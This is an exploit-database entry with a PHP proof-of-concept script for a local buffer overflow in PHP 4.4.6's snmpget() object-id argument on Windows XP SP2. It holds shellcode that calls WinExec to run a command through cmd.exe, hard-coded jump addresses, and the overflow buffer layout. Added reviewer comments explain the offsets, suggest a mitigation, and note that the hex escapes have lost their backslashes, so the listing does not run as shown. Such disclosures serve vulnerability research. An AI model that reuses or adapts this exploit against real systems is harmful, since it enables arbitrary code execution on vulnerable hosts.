
# Title : PHP 4.4.6 snmpget() object id Local Buffer Overflow Exploit PoC
# Published : 2007-03-09
# Author : rgod
# Previous Title : PHP 4.4.6 cpdf_open() Local Source Code Disclosure PoC
# Next Title : PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC


<?php

// PHP 4.4.6 snmpget() object id local buffer overflow poc exploit
// by rgod
// site: http://retrogod.altervista.org

// win xp sp2 version
// to be launched from the cli
//
// Reviewer notes (defensive reading of this PoC):
//  - The trigger is the third snmpget() argument (the object id) being
//    oversized; the author's comment next to the call says more than 256
//    chars already gives a plain EIP overwrite. The filler counts and the
//    two hard-coded addresses below are specific to the PHP/Windows build
//    named above and will not line up on anything else.
//  - As rendered on this page the "\x" escapes have lost their backslashes
//    ("xebx1b" instead of "\xeb\x1b"), so every string is literal ASCII and
//    the byte lengths no longer match what the offsets assume; the listing
//    as shown is not runnable as-is.
//  - Mitigation: on an affected build, never let attacker-controlled data
//    reach the object-id argument of snmpget(); the bug is only reachable
//    when the SNMP extension is loaded (checked directly below).

// Refuse to run when the vulnerable extension is not present.
if (!extension_loaded("snmp")){
die("you need the snmp extension loaded.");
}

// Payload stub (see the rendering note above about the missing
// backslashes). Decoding the hex, the tail of the stub spells the command
// name "cmd.exe /c " and the final plain-text line is its argument. The
// WinExec / ExitProcess address comments are the author's and belong to the
// build named in the header.
$____scode=
"xebx1b".
"x5b".
"x31xc0".
"x50".
"x31xc0".
"x88x43x59".
"x53".
"xbbx6dx13x86x7c". //WinExec
"xffxd3".
"x31xc0".
"x50".
"xbbxdaxcdx81x7c". //ExitProcess
"xffxd3".
"xe8xe0xffxffxff".
"x63x6dx64".
"x2e".
"x65".
"x78x65".
"x20x2f".
"x63x20".
"start notepad & ";

$edx="x64x8fx9bx01"; //jmp scode
$eip="x73xdcx82x7c"; //0x7C82DC73      jmp edx
// Buffer layout, left to right: 188 filler bytes, the value that ends up in
// edx, 64 more filler bytes, the saved-return-address overwrite, then a
// NOP run, the stub, and a trailing NOP run. The filler counts are the
// overflow offsets for the build named above.
$____suntzu=str_repeat("A",188).$edx.str_repeat("A",64).$eip.str_repeat("x90",48).$____scode.str_repeat("x90",48);
//more than 256 chars result in simple eip overwrite
// Host and community are the integer 1 (presumably coerced to the string
// "1"; PHP 4 has no strict_types). The title calls this a *local* overflow
// in object-id handling, so presumably no SNMP peer has to answer for the
// crash to occur — confirm against the affected build.
snmpget(1,1,$____suntzu);

?>
